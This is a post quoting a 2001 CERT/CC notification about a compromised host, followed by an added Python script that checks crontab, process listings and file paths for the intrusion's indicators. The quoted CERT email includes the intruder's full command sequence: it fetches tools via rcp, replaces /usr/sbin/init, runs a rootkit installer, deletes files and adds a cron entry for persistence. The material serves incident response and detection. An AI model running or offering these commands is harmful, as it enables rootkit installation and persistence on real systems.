Hi all,
The first time I was hacked I got the following email:
Hello,
My name is Ian Finlay. I am a member of the technical staff at the CERT Coordination Center. The CERT/CC provides technical assistance to Internet sites in response to computer security incidents. For more information about the CERT/CC, please see http://www.cert.org/

We are contacting you as a WHOIS registered point of contact for resources that were involved in a security incident being handled by the CERT/CC. If there is a more appropriate point of contact for security incidents, please forward this message.

The CERT/CC received a report on 02/20/01 from a site with a root compromised system. An intruder appeared to have been using the system as a file repository for intruder tools. The reporter indicated to us that at some point in time, they believe the following host(s) in your network contacted this compromised host to obtain intruder tools:

    209.88.xxx.xxx (Here my IP)

The reporter claimed that once the intruder tools had been obtained, the intruder executed the following commands on the compromised machine:

    cd / ; rcp 62050w01 XXX XXX XXX XXX:net4.gz /usr/sbin/init.gz ; rm -rf /usr/sbin/init ; gzip -d /usr/sbin/init.gz ; chmod +x /usr/sbin/init
    /usr/sbin/init
    cd /tmp ; rcp 62050w01 XXX XXX XXX XXX:erkms.tgz . ; tar zxvf erkms.tgz ; cd erk ; ./go ; rm -rf /var/named/a
    echo "*/5 * * * * /usr/sbin/init" >/cr0n
    killall -9 inetd
    /usr/sbin/inetd
    /usr/bin/crontab /cr0n >>/dev/null
    rm -rf /cr0n >>/dev/null
    killall -9 named >>/dev/null
    /usr/sbin/named & >>/dev/null

We encourage you to check for signs of intruder activity on the host(s) listed above.

We have assigned an internal reference number to this notification and it is included in the subject line of this message. Please include the reference number in the subject line of future correspondence about this notification.

Regards,
Ian

Ian Finlay
Internet Security Analyst - CERT/CC Operations
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CERT (R) Coordination Center        Email: cert cert org
Software Engineering Institute      WWW: http://www.cert.org
Carnegie Mellon University          Hotline: +1-412-268-7090
Pittsburgh, PA USA 15213-3890       FAX: +1-412-268-6989
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOpbL8gYcfu8gsZJZAQHVnAQAhxU41BiNUv6h26c8Z++Na89LSTU4fnEL
Rn+RgaLPbskY0Tz5m/Dn/A0UYhP5Nur+N46bjzofmFtUfzBRiHjGZwOZ2pDdUcET
EeB0mlljf7qvWdretDc1Rx4boPwuTficHQdh7xAvetkNAbgEXEYXoZ7NHfyk6C1T
Dorg/l9LDk4=
=dVLN
-----END PGP SIGNATURE-----
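The notification asks the recipient to "check for signs of intruder activity", and the command transcript it quotes hands over the indicators to look for: a crontab entry that respawns /usr/sbin/init every five minutes, a second init process besides PID 1, and the files /cr0n, /usr/sbin/init.gz, /tmp/erkms.tgz and /tmp/erk. The script below is an added example of turning that transcript into a host check; it is not CERT/CC tooling and was not part of the original post. It assumes the crontab and `ps -eo pid,ppid,comm` output are supplied as text (so it can be run against saved output or a mounted image), and the sample crontab, ps listing and demo directory tree it ships with are constructed for the demonstration.

```python
"""Indicator check for the intrusion described in the CERT notification
above. Added example, not CERT/CC tooling; the sample crontab and ps
output are constructed, the paths come from the quoted command transcript."""
import os
import re
import tempfile
from typing import Dict, List

# Files the transcript creates or leaves behind on the victim.
SUSPECT_PATHS = ["/cr0n", "/usr/sbin/init.gz", "/tmp/erkms.tgz", "/tmp/erk"]

# Five schedule fields, then the command (a system crontab adds a user
# field, which simply becomes part of the captured command).
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<cmd>.+)$")
INIT_TOKEN = re.compile(r"(?<![\w/.-])/usr/sbin/init(?![\w/.-])")


def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Return crontab lines whose command runs /usr/sbin/init.

    init is started by the kernel and has no business in a crontab; the
    intruder used '*/5 * * * * /usr/sbin/init' to respawn the replaced binary.
    """
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m and INIT_TOKEN.search(m.group("cmd")):
            hits.append(line.rstrip())
    return hits


def rogue_init_processes(ps_text: str) -> List[Dict[str, int]]:
    """Parse 'ps -eo pid,ppid,comm' output and return every process named
    init other than PID 1. A second init is the cron-spawned trojan."""
    rogues = []
    for line in ps_text.splitlines()[1:]:   # skip the header row
        parts = line.split(None, 2)
        if len(parts) != 3 or not parts[0].isdigit():
            continue
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        if os.path.basename(comm) == "init" and pid != 1:
            rogues.append({"pid": pid, "ppid": ppid})
    return rogues


def existing_suspect_paths(root: str = "/") -> List[str]:
    """Report which of SUSPECT_PATHS exist under root, so the check can be
    pointed at a mounted forensic image instead of the live filesystem."""
    return [p for p in SUSPECT_PATHS
            if os.path.lexists(os.path.join(root, p.lstrip("/")))]


def make_demo_image() -> str:
    """Build a throwaway directory tree that mimics a compromised root
    (constructed for the demo: only /cr0n and /tmp/erk are present)."""
    root = tempfile.mkdtemp(prefix="cert-demo-")
    os.makedirs(os.path.join(root, "tmp", "erk"))
    open(os.path.join(root, "cr0n"), "w").close()
    return root


# Constructed sample crontab: one benign entry and the intruder's entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/sbin/init
"""

# Constructed sample 'ps -eo pid,ppid,comm' output with a second init.
SAMPLE_PS = """\
  PID  PPID COMMAND
    1     0 init
  212     1 inetd
  340     1 init
  355   340 sh
"""


def run_checks(crontab_text: str, ps_text: str, root: str) -> Dict[str, list]:
    """Bundle the three checks into one report."""
    return {
        "cron": suspicious_cron_entries(crontab_text),
        "rogue_init": rogue_init_processes(ps_text),
        "files": existing_suspect_paths(root),
    }


if __name__ == "__main__":
    demo_root = make_demo_image()
    for name, findings in run_checks(SAMPLE_CRONTAB, SAMPLE_PS, demo_root).items():
        print(f"{name}: {findings or 'clean'}")
```

On a real host, feed it `crontab -l` output for root (and /etc/crontab) plus `ps -eo pid,ppid,comm`, and point `existing_suspect_paths` at the mount point of the suspect disk rather than `/`: the transcript replaces init itself and restarts inetd and named, so the binaries and process listing on the live system are exactly what you cannot trust.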